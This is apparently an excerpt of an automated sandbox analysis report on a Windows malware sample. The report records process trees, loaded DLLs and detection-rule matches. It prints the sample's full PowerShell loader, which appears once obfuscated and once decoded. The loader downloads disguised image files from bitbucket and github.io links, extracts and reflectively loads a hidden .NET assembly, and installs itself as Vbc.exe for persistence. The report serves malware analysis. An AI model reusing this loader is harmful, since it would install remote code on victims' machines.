            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D81D280_2_00007FF6A1D81D28
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D866C40_2_00007FF6A1D866C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D840C40_2_00007FF6A1D840C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D86CA40_2_00007FF6A1D86CA4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D82DB40_2_00007FF6A1D82DB4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D85D900_2_00007FF6A1D85D90
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D835300_2_00007FF6A1D83530
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D81C0C0_2_00007FF6A1D81C0C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD347822FB5_2_00007FFD347822FB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34780F5D5_2_00007FFD34780F5D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD347831D55_2_00007FFD347831D5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_06900B139_2_06900B13
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 5932 bytes, 1 file, at 0x2c +A "67a7e5e159f71.vbs", ID 1258, number 1, 1 datablock, 0x1503 compression
            Source: Vbc.exe.9.drStatic PE information: Resource name: RT_STRING type: VAX-order2 68k Blit mpx/mux executable
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe, 00000000.00000002.2118655895.00007FF6A1D8E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5188
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5188Jump to behavior
            Source: Process Memory Space: powershell.exe PID: 1352, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 5388, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@18/11@2/3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D86CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF6A1D86CA4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D81C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF6A1D81C0C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D866C4 LocalAlloc,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA,0_2_00007FF6A1D866C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D87AC8 FindResourceA,LoadResource,DialogBoxIndirectParamA,FreeResource,0_2_00007FF6A1D87AC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Users\user\AppData\Roaming\XenoManagerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2644:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5176:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_03
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 67a7e5e159f71.vbs
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeVirustotal: Detection: 41%
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeReversingLabs: Detection: 39%
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 67a7e5e159f71.vbs
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -exec
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Vbc.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe "C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe"
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 67a7e5e159f71.vbsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -execJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Vbc.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe "C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe" Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeSection loaded: feclient.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeSection loaded: advpack.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
